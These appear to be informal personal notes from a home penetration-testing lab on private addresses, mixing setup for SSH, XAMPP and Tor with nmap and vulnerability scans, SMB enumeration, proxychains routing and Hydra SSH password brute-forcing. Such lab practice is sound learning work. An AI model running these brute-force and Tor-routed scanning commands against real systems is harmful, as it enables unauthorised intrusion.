nmap 192.168.174.129 -p- --min-rate 20000
nmap -sCV 192.168.174.129 
nmap -sV -sC --script=vuln -v 192.168.174.129
smbclient -L \\\\192.168.174.129  
smbclient \\\\192.168.174.129\\ahad34








proxychains nmap -sT -p 1335 192.168.174.129
proxychains nmap -sT -p 80  192.168.174.128

/////
nmap 192.168.174.130 -p- --min-rate 20000 >>ahad1.txt
nmap -sCV 192.168.174.130 >> ahad2.txt  

sudo apt-get install apache2(in vple) if needed 
sudo apt-get install phpmyadmin(in vple) if needed 

python -m http.server 8081 (server2.py ) we will use this script 

////downloding  server2.py from kali server (192.168.174.128)

wget 192.168.174.129:8081/server2.py(IN VPLE)

sudo apt-get install python-pip( in vple)
pip install http
sudo apt-get install python3-pip(IN vple)
python3 server2.py(in vple)
python3 -m http.server 8081 (in vple)

////in vple  for (server2.py) we will blank the ip address for our purpose  



////for ssh 
sudo apt-get install openssh-server(in kali linux)
sudo apt-get install ufw 
sudo ufw allow ssh
sudo service ssh restart 

///// (now if we go to arch /debian or any linux distribution we can login using the below command )
ssh sajib@192.168.174.128
         or 
sudo ssh -p 22  administrator@192.168.174.129
 both of them will work perfectly



/////now setiing docker 

///setting hydra brute force 
ALHAMDULLAH !!!! successfully cracked password using hydra
hydra -l administrator -P password.txt -T 20 192.168.174.129 ssh
hydra -l sajib -P password.txt -T 20 192.168.174.128  ssh

///proxychain with Tor
sudo apt-get install tor
sudo service tor start
service tor status


////xampp configuration
don't use (service apache2 start)
if once install xampp then:
  cd /opt/lampp/htdocs
  after  going to this directory type 
     sudo mkdir phplogin
     cd /phplogin
  here ww will put our web files :
          connection.php
          index.php
          login.php
          style.css
          welcome.php

after shutting down down or rebooting 
open root terminal

cd /opt/lampp
./xampp start

inshallah  hopefully everything will works fine !!!!










